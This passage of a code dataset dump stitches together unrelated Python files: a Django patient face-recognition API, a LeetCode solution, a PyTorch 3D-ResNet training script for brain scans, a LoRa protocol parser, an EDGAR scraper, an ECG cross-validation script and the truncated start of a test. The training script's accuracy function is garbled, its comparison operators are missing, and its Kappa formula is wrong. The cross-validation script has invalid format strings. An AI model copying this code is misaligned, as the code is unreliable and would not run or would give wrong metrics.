'Please Choose a Patient Photo'},\n status=status.HTTP_400_BAD_REQUEST)\n known_face_directory = KNOWN_FACE_DIRECTORY\n with open(settings.DATA_SET_PATH, 'rb') as f:\n all_face_encodings = pickle.load(f)\n\n unknown_image = face_recognition.load_image_file(patient_photo)\n\n if not face_recognition.face_encodings(unknown_image):\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n # unknown_face_encoding = face_recognition.face_encodings(unknown_image)[0]\n mtcnn = MTCNN()\n detected_face = ''\n faces = mtcnn.detect_faces(unknown_image)\n try:\n for face in faces:\n x,y,z,a = face['box']\n detected_face = unknown_image[y:y+a,x:x+z]\n except:\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n # import numpy as np\n if np.array(detected_face).size == 0 or detected_face =='':\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n locations = face_recognition.face_locations(detected_face, model='cnn')\n\n if not locations:\n return Response({'status': 'fail', 'message': 'Cant Detect Face second'},status=status.HTTP_400_BAD_REQUEST)\n encodings = face_recognition.face_encodings(detected_face, locations)\n\n face_names = list(all_face_encodings.keys())\n face_encodings = np.array(list(all_face_encodings.values()))\n for face_encoding, face_location in zip(encodings, locations):\n results = face_recognition.compare_faces(face_encodings, face_encoding, 0.45)\n match = None\n if True in results:\n match = face_names[results.index(True)]\n print(f\"Match found : {match}\")\n # add images to existing folder\n pil_img = Image.open(patient_photo)\n np_img = np.array(pil_img)\n img = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\n path = os.path.join(known_face_directory,match)\n photo_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) + '.jpg'\n cv2.imwrite(os.path.join(path, photo_name), img)\n\n return Response({'status': 'success', 'message': 'Face Recognised Successfully', 'data': match})\n else:\n print(\"Match Not Found\")\n return Response({'status': 'fail', 'message': 'Match Not Found'},status=status.HTTP_400_BAD_REQUEST)\n\n except Exception as e:\n logger.exception('Exception {}'.format(e.args))\n return Response({'status': 'fail', 'message': 'Something went wrong. Please try again later'},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\nclass SavePhotoView(generics.GenericAPIView):\n def post(self,request):\n try:\n data = request.data\n logger.info('Request Payload {}'.format(data))\n patient_photo = data.get('patient_photo')\n patient_photo1 = data.get('patient_photo1')\n patient_photo2 = data.get('patient_photo2')\n patient_photo3 = data.get('patient_photo3')\n patient_photo4 = data.get('patient_photo4')\n patient_id = data.get('patient_id')\n if not patient_id:\n return Response({'status': 'fail', 'message': 'Please Choose a Patient'},\n status=status.HTTP_400_BAD_REQUEST)\n\n if not patient_photo or not patient_photo1 or not patient_photo2 or not patient_photo3 or not patient_photo4:\n return Response({'status': 'fail', 'message': 'Please Choose a Patient Photo'},\n status=status.HTTP_400_BAD_REQUEST)\n create_directory = patient_id\n directory = settings.KNOWN_FACE_DIRECTORY\n path = os.path.join(directory, create_directory)\n try:\n os.mkdir(path)\n except OSError as error:\n pass\n # logger.exception('os error {}'.format(error.args))\n # return Response({'status': 'fail', 'message': \"File not Found\"})\n for photo in data.values():\n if patient_id == photo:\n pass\n else:\n pil_img = Image.open(photo)\n np_img = np.array(pil_img)\n img = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\n photo_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5)) + '.jpg'\n\n cv2.imwrite(os.path.join(path, photo_name), img)\n\n return Response({'status': 'success', 'message': 'Photo Stored Successfully'})\n\n except Exception as e:\n logger.exception('Exception {}'.format(e.args))\n return Response({'status': 'fail', 'message': 'Something went wrong. Please try again later'},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"Faceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"213660226","text":"\"\"\"\nYou are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed, the only constraint stopping you from robbing each of them is that adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.\n\nExample 1:\n\nInput: [1,2,3,1]\nOutput: 4\nExplanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\nExample 2:\n\nInput: [2,7,9,3,1]\nOutput: 12\nExplanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if nums:\n if len(nums) == 1: return nums[-1]\n optimal = [nums[0], max(nums[0], nums[1])]\n if len(nums) > 2:\n for i, num in enumerate(nums[2::]):\n optimal.append(max(optimal[i+1], optimal[i] + num))\n return optimal[-1]\n return 0\n\n \n","sub_path":"LeetCode/easy/198_House_robber.py","file_name":"198_House_robber.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10910644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 27 18:09:50 2021\n\n@author: Ding\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 22:50:13 2021\n\n@author: Ding\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 17:08:09 2021\n\n@author: Ding\n\"\"\"\n\n\n#main.py\nimport os\nimport time\nimport shutil\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport resnet3d\nimport torch.backends.cudnn as cudnn\nfrom sklearn.model_selection import StratifiedKFold\nfrom torch.utils.data.dataset import Dataset\nimport torch.multiprocessing as mp\n#settings\nparser = argparse.ArgumentParser(description='single brain region model')\n\nparser.add_argument('--local_rank', default=-1, type=int,\n help='node rank for distributed training')\nparser.add_argument('--epochs', default=150, type=int, \n help='number of total epochs to run')\nparser.add_argument('--batch_size',default=128, type=int,\n help='batch size of all GPUs')\nparser.add_argument('--lr',default=1e-3,type=float,\n help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, \n help='momentum')\nparser.add_argument('--weight_decay',\n default=1e-4,\n type=float,\n help='weight decay (default: 1e-4)')\nparser.add_argument('-p', '--print-freq', default=10, type=int, \n help='print frequency (default: 10)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', \n help='evaluate model on validation set')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true', \n help='use pre-trained model')\nparser.add_argument('--seed', default=None, type=int, \n help='seed for initializing training. ')\nparser.add_argument('-a','--arch',default='resnet18',\n help='model name')\n#parser.add_argument('data', default=None, type=float, \n# help='dataset, including train and test set and their labels, which will be segmented by K fold. ')\n\n\n\ndef reduced_mean(tensor, nprocs):\n rt = tensor.clone()\n torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)\n rt /= nprocs\n return rt\n\ndef gather_tensor(tensor):\n rt=[tensor.clone() for _ in range(torch.distributed.get_world_size()) ]\n torch.distributed.all_gather(rt, tensor)\n concat= torch.cat(rt,dim=0)\n return concat\n\nclass InputDataset(Dataset):\n def __init__(self,inputdata,inputlabel):\n self.Data=inputdata\n self.Label=inputlabel\n \n def __getitem__(self, index):\n data=self.Data[index]\n label=self.Label[index]\n return data, label \n \n def __len__(self):\n return len(self.Data)\n\nclass AGC(nn.Module):\n def __init__(self,in_channel, out_channel,hidden_channel):\n super(AGC,self).__init__()\n \n self.layer1=nn.Sequential(nn.Conv3d(in_channel, hidden_channel, kernel_size=(1,1,1), bias=False),\n nn.BatchNorm3d(hidden_channel),\n nn.ReLU())\n \n self.layer2=nn.Sequential(nn.Conv3d(hidden_channel,out_channel, kernel_size=(1,1,1), bias=False),\n nn.Sigmoid())\n \n def forward(self,x):\n x=self.layer1(x)\n out=self.layer2(x)\n \n return out\n \nclass PC_ResNet(nn.Module):\n def __init__(self,ResNet_Model):\n super(PC_ResNet,self).__init__()\n \n self.block1=nn.Sequential(*list(ResNet_Model.children())[-10:-6])\n self.block2=nn.Sequential(*list(ResNet_Model.children())[-6:-5])\n self.block3=nn.Sequential(*list(ResNet_Model.children())[-5:-4])\n self.block4=nn.Sequential(*list(ResNet_Model.children())[-4:-3])\n self.block5=nn.Sequential(*list(ResNet_Model.children())[-3:-2])\n self.block6=nn.Sequential(\n nn.Linear(6528,2))\n self.Flatten=nn.Flatten()\n def forward(self, x):\n x=self.block1(x)\n x=self.block2(x)\n f1=self.Flatten(x)\n x=self.block3(x)\n f2=self.Flatten(x)\n x=self.block4(x)\n f3=self.Flatten(x)\n x=self.block5(x)\n f4=self.Flatten(x)\n out=torch.cat((f1,f2,f3,f4),dim=1)\n out=self.block6(out)\n return out \n \n \ndef main():\n args = parser.parse_args()\n args.nprocs = torch.cuda.device_count()\n# args.nprocs = 2\n# os.environ['CUDA_VISIBLE_DEVICES']='4,5'\n os.environ['MASTER_ADDR'] ='124.16.75.175'\n os.environ['MASTER_PORT'] = '12345'\n data_path='/home/ding/exp_2/data/Hippocampus_LAD_NC.npy'\n data=np.load(data_path)\n\n\n \n label=np.concatenate((np.ones([200,1],dtype=float),np.zeros([235,1],dtype=float)),0)\n args.label=label\n data=InputDataset(data,label)\n args.data=data\n model=resnet3d.ResNet(resnet3d.BasicBlock, [1, 1, 1, 1],resnet3d.get_inplanes(),\n n_input_channels=1,\n conv1_t_size=27,\n conv1_t_size2=27,\n conv1_t_size3=20,\n conv1_t_stride=1,\n no_max_pool=False,\n shortcut_type='B',\n n_classes=2)\n \n total_model=PC_ResNet(model)\n mp.spawn(main_worker, nprocs=args.nprocs, args=(args.nprocs, args, total_model))\n \n\ndef main_worker(local_rank,nprocs, args, model):\n args.local_rank = local_rank\n torch.distributed.init_process_group(backend='nccl', world_size=args.nprocs, rank=local_rank)\n torch.cuda.set_device(local_rank)\n cudnn.benchmark = True\n args.batch_size = int(args.batch_size / args.nprocs) \n \n kf = StratifiedKFold(n_splits=5,shuffle=True,random_state=2021)\n original_params=model.state_dict()\n n_split=0\n result_mat=np.zeros([5,7])\n for train_idx, test_idx in kf.split(args.data.Data,args.label):\n \n model.load_state_dict(original_params)\n \n model.cuda(local_rank)\n model_para = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank])\n best_acc1= .0\n\n\n \n criterion = nn.CrossEntropyLoss().cuda(local_rank)\n optimizer = torch.optim.SGD(model_para.parameters(), args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n \n train_data=args.data.Data[train_idx]\n train_label=args.data.Label[train_idx]\n train_data=np.array(train_data)\n train_label=np.array(train_label)\n train_data=torch.from_numpy(train_data)\n train_label=torch.from_numpy(train_label)\n \n \n test_data=args.data.Data[test_idx]\n test_label=args.data.Label[test_idx]\n test_data=np.array(test_data)\n test_label=np.array(test_label)\n test_data=torch.from_numpy(test_data)\n test_label=torch.from_numpy(test_label)\n \n train_dataset = torch.utils.data.TensorDataset(train_data,train_label)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n \n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n num_workers=2,\n pin_memory=True,\n sampler=train_sampler)\n \n \n test_dataset = torch.utils.data.TensorDataset(test_data,test_label)\n test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset)\n test_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n num_workers=2,\n pin_memory=True,\n sampler=test_sampler)\n \n \n if args.evaluate:\n validate(test_loader, model_para, criterion, local_rank, args)\n return\n \n for epoch in range(args.epochs):\n \n train_sampler.set_epoch(epoch)\n test_sampler.set_epoch(epoch)\n \n adjust_learning_rate(optimizer, epoch, args)\n \n train(train_loader, model_para, criterion, optimizer, epoch, local_rank, args)\n \n acc1 = validate(test_loader, model_para, criterion, local_rank, args)\n \n is_best = acc1.Accuracy > best_acc1\n best_acc1 = max(acc1.Accuracy, best_acc1)\n\n if args.local_rank == 0:\n save_checkpoint(\n {\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model_para.module.state_dict(),\n 'best_acc1': best_acc1,\n }, is_best)\n \n result_path='/home/ding/exp_2/result/result_Hippocampus_L_PC_ResNet_'+str(n_split)+'time.npy'\n result_mat[n_split,0]=acc1.Accuracy\n result_mat[n_split,1]=acc1.TPR\n result_mat[n_split,2]=acc1.FPR\n result_mat[n_split,3]=acc1.Precision\n result_mat[n_split,4]=acc1.F1score\n result_mat[n_split,5]=acc1.Kappa\n n_split=n_split+1\n np.save(result_path,result_mat)\n \ndef train(train_loader, model, criterion, optimizer, epoch, local_rank, args):\n model.train()\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n Accuracy=AverageMeter('Accuracy', ':6.3f')\n progress = ProgressMeter(len(train_loader), [batch_time, losses, Accuracy],\n prefix=\"Epoch: [{}]\".format(epoch))\n end=time.time()\n for i,(data,label) in enumerate(train_loader):\n# print(i)\n data=data.unsqueeze(dim=1)\n label=label.squeeze()\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data=data.cuda(local_rank,non_blocking=True)\n label=label.cuda(local_rank,non_blocking=True)\n \n \n \n output=model(data)\n \n loss = criterion(output, label)\n \n torch.distributed.barrier()\n \n total_output=gather_tensor(output)\n total_label=gather_tensor(label)\n \n result=accuracy(total_output,total_label)\n Accuracy.update(result.Accuracy)\n reduced_loss = reduced_mean(loss, args.nprocs)\n \n losses.update(reduced_loss.item(), data.size(0))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n\n progress.display(i)\n\n\ndef validate(test_loader, model, criterion, local_rank, args):\n \n model.eval()\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n Accuracy= AverageMeter('Accuracy', ':6.3f')\n progress = ProgressMeter(len(test_loader), [batch_time, losses, Accuracy ], prefix='Test: ')\n \n with torch.no_grad():\n end = time.time()\n for i, (data, label) in enumerate(test_loader):\n data=data.unsqueeze(dim=1)\n label=label.squeeze()\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data=data.cuda(local_rank,non_blocking=True)\n label=label.cuda(local_rank,non_blocking=True)\n\n # compute output\n output = model(data)\n loss = criterion(output, label)\n\n\n\n torch.distributed.barrier()\n \n total_output=gather_tensor(output)\n total_label=gather_tensor(label)\n\n result=accuracy(total_output,total_label)\n reduced_loss = reduced_mean(loss, args.nprocs)\n \n losses.update(reduced_loss.item(), data.size(0))\n \n batch_time.update(time.time() - end)\n \n Accuracy.update(result.Accuracy)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n\n\n return result\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, 'model_best.pth.tar')\n \n \n \n \n \n \nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\nclass Result(object):\n def __init__(self, Accuracy,TPR,FPR,Precision,Kappa,F1score):\n self.Accuracy=Accuracy\n self.TPR=TPR\n self.FPR=FPR\n self.Precision=Precision\n self.Kappa=Kappa\n self.F1score=F1score\n \ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = args.lr * (0.1**(epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n \ndef accuracy(output,label):\n with torch.no_grad():\n \n TP=0\n TN=0\n FP=0\n FN=0\n n_sample=output.shape[0]\n\n for i in range(n_sample):\n\n if (output[i,0]output[i,1]) and (label[i]==0):\n TN=TN+1\n if (output[i,0]output[i,1]) and (label[i]==1): \n FN=FN+1\n \n Accuracy = -1\n TPR=-1\n FPR=-1\n Precision=-1\n Recall=-1 \n F1score=-1\n Pe=-1\n Kappa=-1\n \n if TP+TN+FP+FN !=0:\n Accuracy=(TP+TN) / (TP+TN+FP+FN) \n if TP+FN !=0:\n TPR=TP/(TP+FN) \n if FP+FN != 0:\n FPR=FP/(FP+TN) \n if TP+FP != 0:\n Precision=TP/(TP+FP)\n if TP+FN != 0:\n Recall=TP/(TP+FN)\n if Precision+Recall != 0:\n F1score=(2*Precision*Recall)/(Precision+Recall) \n if TP+TN+FP+FN != 0:\n Pe=(TN+TP)/((TP+TN+FP+FN)**2)\n if 1-Pe !=0:\n Kappa=(Accuracy-Pe)/(1-Pe)\n\n result=Result(Accuracy=Accuracy,TPR=TPR,FPR=FPR,Precision=Precision, Kappa=Kappa,F1score=F1score)\n \n return result\n \nif __name__ == '__main__':\n main()","sub_path":"main_PCR.py","file_name":"main_PCR.py","file_ext":"py","file_size_in_byte":15586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"452595280","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/8/28 10:10\n# @Author : Aries\n# @Site : \n# @File : 进程池.py\n# @Software: PyCharm\nfrom multiprocessing import Pool\nimport os,time\ndef task(n):\n print(\"<%s> is running\"%os.getpid())\n time.sleep(2)\n print(\"<%s> is done\"%os.getpid())\n return n**2\nif __name__ == '__main__':\n p=Pool(4)\n for i in range(1,7):\n res=p.apply(task,args=(i,))\n print(\"本次任务的结果:%s\"%res)\n print(\"主\")\n\nprint(\"cpu个数是%s\"%os.cpu_count())","sub_path":"python/多线程/共享内存案例/进程池.py","file_name":"进程池.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"305673267","text":"import asyncio\n\nimport aiopubsub\n\nfrom boatgod.hub import lora_publisher\nfrom boatgod.nmea2000 import create_rmp_message, create_voltage_message\n\n\nclass LoraProtocol(asyncio.Protocol):\n VOLTAGE_MULTIPLIER = 1.7636363636363637 / 100\n RPM_CALIBRATION = 1\n\n def __init__(self):\n self.result = []\n self.inverse = 0x00\n self.state = 0\n self.point = 0\n self.len = 0\n self.crc = 0\n self.transport = None\n\n def connection_made(self, transport):\n self.transport = transport\n print('port opened', transport)\n\n def data_received(self, pck):\n for a in pck:\n if a == 0xAA:\n self.result = []\n self.state = 1\n self.point = 0\n self.len = 0\n self.inverse = 0x00\n self.crc = 0\n continue\n if a == 0xBB:\n self.inverse = 0xFF\n continue\n if self.state == 0:\n continue\n b = a ^ self.inverse\n self.inverse = 0\n if self.point == 0:\n self.len = b\n\n if self.point > self.len:\n if b != (self.crc & 255):\n self.state = 0\n continue\n self.on_message(self.result[1:])\n self.crc += b\n self.result.append(b)\n self.point += 1\n\n def connection_lost(self, exc):\n pass\n\n def on_message(self, msg):\n\n cmd = msg[3]\n if cmd == 0x02: # напряжение оборотыm\n v = int.from_bytes(msg[6:8], \"little\") * LoraProtocol.VOLTAGE_MULTIPLIER\n rpm = int.from_bytes(msg[4:6], \"little\") * 60 * LoraProtocol.RPM_CALIBRATION\n lora_publisher.publish(aiopubsub.Key('obj', 'voltage'), v)\n lora_publisher.publish(aiopubsub.Key('obj', 'rpm'), rpm)\n\n lora_publisher.publish(aiopubsub.Key('message', 'nmea2000'),\n create_rmp_message(rpm))\n\n lora_publisher.publish(aiopubsub.Key('message', 'nmea2000'),\n create_voltage_message(v))\n\n if cmd == 0x03: # геркон протечка напряжение на батарейке\n lora_publisher.publish(aiopubsub.Key('obj', 'flood'),\n dict(water=msg[4],\n door=msg[5],\n battery=msg[6],\n ))\n","sub_path":"boatgod/lora.py","file_name":"lora.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"431745556","text":"#!/usr/bin/env python\n\n'''\nWeb scraper for the edgar company listings site. Parses company information\nfrom HTML to a list that contains a JSON list of company json objects.\n\nSearches through a list of pages and parses company links on the page from the\ngiven company listings. Parses information from each company information page\nand creates a json object for each company, which is stored in a list and\nwritten to a specified file.\n\nAuthor: Alexander Roth\nDate: 2016-03-26\n'''\n\nfrom bs4 import BeautifulSoup\nimport json\nimport requests\nimport sys\n\nBASE_EDGAR_URL = 'http://data-interview.enigmalabs.org'\nEDGAR_URL = 'http://data-interview.enigmalabs.org/companies/'\n\n\ndef main():\n main = get_webpage(EDGAR_URL)\n\n json_list = []\n next_link = get_next_link(main)\n\n # When the scrapper reaches the final page in the sequence of pages, the\n # next anchor links to an octothrope.\n while next_link != '#':\n json_list.extend(collect_enties_on_page(main))\n next_link = get_next_link(main)\n main = get_webpage(BASE_EDGAR_URL + next_link)\n\n write_list_to_file(json_list, 'solution.json')\n\n\ndef get_webpage(url):\n '''\n Returns a BeautifulSoup object of the HTML document specified by the given\n URL.\n\n Arguments:\n url -- A path to a specified HTML document\n '''\n assert type(url) is str\n\n result = requests.get(url)\n page = BeautifulSoup(result.text, 'html.parser')\n\n return page\n\n\ndef get_next_link(page):\n '''\n Returns a link to the next company list page in the sequence of list pages\n\n Arguments:\n page -- The list page currently being examined\n '''\n assert page\n\n return page.ul.find(attrs={'class': 'next'}).contents[0].get('href')\n\n\ndef collect_enties_on_page(page):\n '''\n Returns a list of dictionaries that contain information for all companies\n located within the company table for a given page.\n\n Since each page lists companies and maintains links to these companies'\n information page, we locate all the anchors within the company table and\n examine each of these links for company information to scrape. Once we\n generate the json object, we append it to the json list.\n\n Arguments:\n page -- The current page containing the table of companies\n '''\n assert page\n\n json_list = []\n\n for link in page.tbody.find_all('a'):\n company_link = BASE_EDGAR_URL + link.get('href')\n company_page = get_webpage(company_link)\n company_json = scrape_company_page(company_page)\n json_list.append(company_json)\n\n return json_list\n\n\ndef scrape_company_page(page):\n '''\n Returns python dictionary that contains information related to a company\n from the company's information page.\n\n Since all the informaiton for the company is maintained in a well-formatted\n table, we take the id of the row as the key and the text of the row as the\n value for the key-value pair for that company in a dictionary.\n\n Arguments:\n page -- The company page being parsed\n '''\n assert page\n\n return {row.get('id'): row.text for row in page.find_all(has_id)}\n\n\ndef has_id(tag):\n '''\n Returns true if the specified tag object has an ID.\n\n Arguments:\n tag -- The tag object being examined\n '''\n return tag.has_attr('id')\n\n\ndef write_list_to_file(json_list, filename):\n '''\n Writes the specified json list out to the specified json file.\n\n Arguments:\n json_list -- A list of json-like objects\n filename -- The path to the specified json file\n '''\n assert json_list\n assert type(json_list) is list\n assert type(filename) is str\n\n with open(filename, 'w') as json_file:\n json.dump(json_list, json_file, indent=2)\n\n\ndef print_arguments(arg):\n ''' Prints arguments of script to standard output. '''\n print('python {}'.format(arg))\n sys.exit(1)\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n main()\n else:\n print_arguments(arg)\n","sub_path":"enigma/web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"575980452","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport gc\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\n# import seaborn as sns\n\nfrom models.Conv1d import *\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras import backend as K\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom utils_ml import *\nfrom utils_data import *\n\n\ndef train_and_evaluate(model, X_train, Y_train, X_test, Y_test, model_name):\n\n model_path = \"./trained_models/{}/\".format(model_name)\n\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n checkpointer = ModelCheckpoint(filepath='{}/best_model.h5'.format(model_path),\n monitor='val_acc',\n verbose=1,\n save_best_only=True)\n\n # early_stopping = EarlyStopping(monitor='val_acc', min_delta=0, patience=50, verbose=1, mode='auto')\n\n # print(\"x shape\", X_train.shape)\n # print(\"y shape\", Y_train.shape)\n\n hist = model.fit(X_train, Y_train,\n validation_data=(X_test, Y_test),\n batch_size=275,\n epochs=3,\n verbose=2,\n shuffle=True,\n callbacks=[checkpointer])\n\n # save history\n pd.DataFrame(hist.history).to_csv('{}/history.csv'.format(model_path))\n\n pd.DataFrame(hist.history['acc']).to_csv('{}/train_acc.csv'.format(model_path))\n pd.DataFrame(hist.history['loss']).to_csv('{}/loss.csv'.format(model_path))\n pd.DataFrame(hist.history['val_acc']).to_csv('{}/val_acc.csv'.format(model_path))\n pd.DataFrame(hist.history['val_loss']).to_csv('{}/val_loss.csv'.format(model_path))\n\n # evaluation\n predictions = model.predict(X_test)\n\n score = accuracy_score(onehots2numbers(Y_test), predictions.argmax(axis=1))\n print('Last epoch\\'s validation score is ', score)\n\n df = pd.DataFrame(predictions.argmax(axis=1))\n df.to_csv('{}/preds_{.4f}.csv'.format(model_path, score), index=None, header=None)\n\n cm = confusion_matrix(onehots2numbers(Y_test), predictions.argmax(axis=1))\n df = pd.DataFrame(cm)\n df.to_csv('{}/confusion_matrix_{.4f}.csv'.format(model_path, score), index=None, header=None)\n\n del model\n K.clear_session()\n gc.collect()\n\n return score\n\n\ndef cross_validation(model, X, Y, n_fold=10):\n skf = StratifiedKFold(n_splits=n_fold, shuffle=True)\n y = Y.reshape(X.shape[0],)\n\n scores = []\n for i, (train_index, val_index) in enumerate(skf.split(X, y)):\n X_train = X[train_index, :]\n Y_train = Y[train_index, :]\n X_val = X[val_index, :]\n Y_val = Y[val_index, :]\n score = train_and_evaluate(model, X_train, Y_train, X_val, Y_val, i)\n scores.append(score)\n\n return scores\n\n\n# project parameters\nDATA_PATH = 'data/training2017/'\nLABELS_PATH = DATA_PATH + 'REFERENCE.csv'\n\n# lower bound of the length of the signal\nLB_LEN_MAT = 100\n\n# upper bound of the length of the signal\nUB_LEN_MAT = 10100\n\nLABELS = [\"N\", \"A\", \"O\"]\nn_classes = len(LABELS) + 1\n\nnp.random.seed(7)\n\nif __name__ == \"__main__\":\n\n # this helps a lot when debugging\n print(os.getcwd())\n\n X, Y = load_cinc_data(DATA_PATH, LB_LEN_MAT, LABELS)\n\n # data preprocessing\n X = duplicate_padding(X, UB_LEN_MAT)\n X = (X - X.mean()) / (X.std())\n X = np.expand_dims(X, axis=2)\n\n # shuffle the data\n values = [i for i in range(len(X))]\n permutations = np.random.permutation(values)\n X = X[permutations, :]\n Y = Y[permutations, :]\n\n # train test split\n train_test_ratio = 0.9\n n_sample = X.shape[0]\n\n X_train = X[:int(train_test_ratio * n_sample), :]\n Y_train = Y[:int(train_test_ratio * n_sample), :]\n X_test = X[int(train_test_ratio * n_sample):, :]\n Y_test = Y[int(train_test_ratio * n_sample):, :]\n \n # load the model and train it\n model = conv1d(UB_LEN_MAT)\n\n cross_validation(model, X, Y)\n # train_and_evaluate(model, X_train, Y_train, X_test, Y_test, \"conv_model\")\n\n","sub_path":"cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"344619145","text":"# Copyright 2015-2016 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom datetime import timezone\n\nimport mock\nimport pytest\n\nfrom paasta_tools import check_marathon_services_replication\nfrom paasta_tools.utils import compose_job_id\n\ncheck_marathon_services_replication.log = mock.Mock()\n\n\n@pytest.fixture\ndef instance_config():\n service = \"fake_service\"\n instance = \"fake_instance\"\n job_id = compose_job_id(service, instance)\n mock_instance_config = mock.Mock(\n service=service,\n instance=instance,\n cluster=\"fake_cluster\",\n soa_dir=\"fake_soa_dir\",\n job_id=job_id,\n )\n mock_instance_config.get_replication_crit_percentage.return_value = 90\n mock_instance_config.get_registrations.return_value = [job_id]\n return mock_instance_config\n\n\ndef test_check_service_replication_for_normal_smartstack(instance_config):\n instance_config.get_instances.return_value = 100\n all_tasks = []\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=666,\n ), mock.patch(\n \"paasta_tools.monitoring_tools.check_replication_for_instance\", autospec=True,\n ) as mock_check_replication_for_service:\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n 